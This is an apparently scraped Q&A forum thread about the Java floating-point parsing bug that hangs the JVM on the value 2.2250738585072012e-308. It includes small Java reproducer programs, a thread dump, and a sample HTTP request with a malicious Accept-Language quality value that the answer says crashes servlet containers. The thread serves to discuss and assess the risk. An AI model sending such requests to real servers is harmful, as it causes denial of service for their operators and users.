There's an easy way to totally lock a lot of JVM:
class runhang {
public static void main(String[] args) {
  System.out.println("Test:");
  double d = Double.parseDouble("2.2250738585072012e-308");
  System.out.println("Value: " + d);
 }
}
or, to hang the compiler:
class compilehang {
public static void main(String[] args) {
  double d = 2.2250738585072012e-308;
  System.out.println("Value: " + d);
 }
}
as explained here: http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/
My question is very simple: which kind of well-conceived web application do you know that can realistically be affected by this?
In other words: on which kind of webapps could an attacker perform a Denial of Service using that known weakness?
It is bad, it is terribly bad. But besides programmers using floating-point for monetary computation I don't see many Java-backed websites that can be crashed.
I can see toy scientific applets being candidates but besides that...
Here's a threadump of the blocked thread (done using "kill -3" on Linux):
"main" prio=1 tid=0x09ab8a10 nid=0x57e9 runnable [0xbfbde000..0xbfbde728]
        at sun.misc.FDBigInt.mult(FloatingDecimal.java:2617)
        at sun.misc.FloatingDecimal.multPow52(FloatingDecimal.java:158)
        at sun.misc.FloatingDecimal.doubleValue(FloatingDecimal.java:1510)
        at java.lang.Double.parseDouble(Double.java:482)
EDIT
JVMs locked here:
java version "1.5.0_10" Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_10-b03) Java HotSpot(TM) Server VM (build 1.5.0_10-b03, mixed mode)
java version "1.6.0_17" Java(TM) SE Runtime Environment (build 1.6.0_17-b04) Java HotSpot(TM) Server VM (build 14.3-b01, mixed mode)
Many web servers parse part of the http headers using Double.parse, so we are dealing with infrastructure here (in addition to any problems with applications that run in the container). The comments of the Exploring Binary blog you link to have the following as an example:
GET / HTTP/1.1
Host: myhost
Connection: keep-alive
Accept-Language: en-us;q=2.2250738585072012e-308
If the servlet that the request is going against makes a call to any of the localization APIs (which would then attempt to parse the language header), the above will bring the server down.
So yes, this is a very big problem. The attack surface is quite large, and the consequences quite high.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With